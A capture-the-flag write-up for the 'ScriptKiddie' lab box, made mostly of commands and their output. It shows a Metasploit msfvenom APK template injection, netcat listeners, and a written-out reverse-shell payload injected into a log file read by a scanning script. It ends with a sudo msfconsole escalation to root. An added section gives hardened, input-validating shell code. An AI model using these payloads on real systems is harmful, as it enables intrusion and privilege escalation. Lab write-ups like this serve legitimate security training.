2 :5000
After looking at it for quite some time, it's definitely some kind of file upload vuln. The uploaded file needs to be some kind of template.
https://www.exploit-db.com/exploits/49491
$ msfconsole -q; use unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
# generate apk file and upload
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.226] 50078
whoami
kid
cd /home
ls -la
ls -la
total 16
drwxr-xr-x 4 root root 4096 Feb 3 07:40 .
drwxr-xr-x 20 root root 4096 Feb 3 07:40 ..
drwxr-xr-x 11 kid kid 4096 Feb 3 11:49 kid
drwxr-xr-x 6 pwn pwn 4096 Feb 3 12:06 pwn
cd pwn
cat scanlosers.sh
#!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
kid@scriptkiddie:/home/pwn$ echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/1337 0>&1' #" >> /home/kid/logs/hackers
$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.226] 44962
bash: cannot set terminal process group (876): Inappropriate ioctl for device
bash: no job control in this shell
whoami
whoami
pwn
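Added example, not part of the original notes or the box's own script: scanlosers.sh is injectable because everything from the third log field onward is pasted into an `sh -c` string. A hardened loop validates the field as an IPv4 address and hands it to nmap as a single argument. The names is_ipv4, safe_targets, scan_targets and SAMPLE_LOG are hypothetical, and the sample log lines are constructed.

```shell
#!/bin/sh
# Added example: validate the log field before it reaches nmap, and never
# rebuild a command string for `sh -c`. Function names are hypothetical.

# is_ipv4 ADDR: succeed only for a dotted quad with every octet in 0-255.
is_ipv4() {
    case "$1" in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;   # digits and single dots only
    esac
    old_ifs=$IFS; IFS=.
    set -- $1            # split on dots; safe, the value holds no glob chars
    IFS=$old_ifs
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        case "$octet" in ????*) return 1 ;; esac   # at most 3 digits
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# safe_targets: read log lines on stdin, print unique valid addresses.
safe_targets() {
    cut -d' ' -f3- | sort -u | while IFS= read -r ip; do
        if is_ipv4 "$ip"; then
            printf '%s\n' "$ip"
        else
            printf 'rejected log entry: %s\n' "$ip" >&2
        fi
    done
}

# scan_targets: each address is one argv word for nmap; nothing is re-parsed.
scan_targets() {
    while IFS= read -r ip; do
        nmap --top-ports 10 -oN "recon/${ip}.nmap" "$ip" >/dev/null 2>&1 &
    done
    wait
}

# Constructed sample log: two placeholder fields, then the address field.
SAMPLE_LOG='f1 f2 10.10.14.2
f1 f2 10.10.14.2
  ;id #
f1 f2 999.1.1.1
f1 f2 192.168.1.7 extra'

# Demo: only the well-formed address survives (prints 10.10.14.2).
printf '%s\n' "$SAMPLE_LOG" | safe_targets 2>/dev/null
```

In the script itself the pipeline would be `safe_targets < "$log" | scan_targets`; keeping the log file writable only by the account that runs the scan closes the cross-user path as well.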
sudo -l
Matching Defaults entries for pwn on scriptkiddie:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User pwn may run the following commands on scriptkiddie:
(root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsolem
sudo msfconsole -q
/bin/bash
stty: 'standard input': Inappropriate ioctl for device
[*] exec: /bin/bash
whoami
root